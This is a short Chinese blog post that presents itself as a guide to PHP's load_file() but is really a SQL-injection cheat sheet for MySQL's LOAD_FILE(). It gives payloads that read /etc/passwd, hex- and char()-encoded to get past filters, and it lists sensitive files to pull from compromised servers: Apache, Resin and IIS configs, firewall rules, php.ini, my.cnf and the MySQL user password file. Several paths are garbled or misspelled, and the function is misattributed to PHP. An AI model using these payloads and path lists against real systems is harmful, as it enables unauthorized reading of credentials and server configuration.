PHP中的load_file()函数用法

黄大仙 47 次浏览 0

一、查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码。

replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

二、列出FreeBSD,Sunos系统根目录

load_file(char(47))

三、查看linux APACHE虚拟主机配置文件

/etc /httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf

四、查看WINDOWS系统apache文件

c:\Program Files\Apache Group\Apache\conf \httpd.conf 

或C:\apache\conf \httpd.conf

五、查看resin文件配置信息。

c:/Resin- 3.0.14/conf/resin.conf
c:/Resin /conf/resin.conf    
 /usr/local/resin/conf/resin.conf

六、phpmyadmin 爆路径

d:\APACHE \Apache2\conf\httpd.conf  
C:\Program Files\mysql\my.ini
/themes /darkblue_orange/layout.inc.php

七、查看IIS的虚拟主机配置文件

c:\windows\system32\inetsrv\MetaBase.xml

八、针对3.0.22的RESIN配置文件查看

/usr/local/resin-3.0.22/conf/resin.conf
/usr/local/resin-pro-3.0.22/conf/resin.conf

九、APASHE虚拟主机查看

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf

十、本看防火墙策略

/etc/sysconfig/iptables

十一、PHP 的相当设置

usr/local/app/php5/lib/php.ini

十二、MYSQL的配置文件

/etc/my.cnf

十三、存在MYSQL系统中的用户密码

C:\mysql\data\mysql\user.MYD

十四、虚拟网站设置

/usr /local/app/apache2/conf/extra/httpd-vhosts.conf

发表评论 取消回复
表情 图片 链接 代码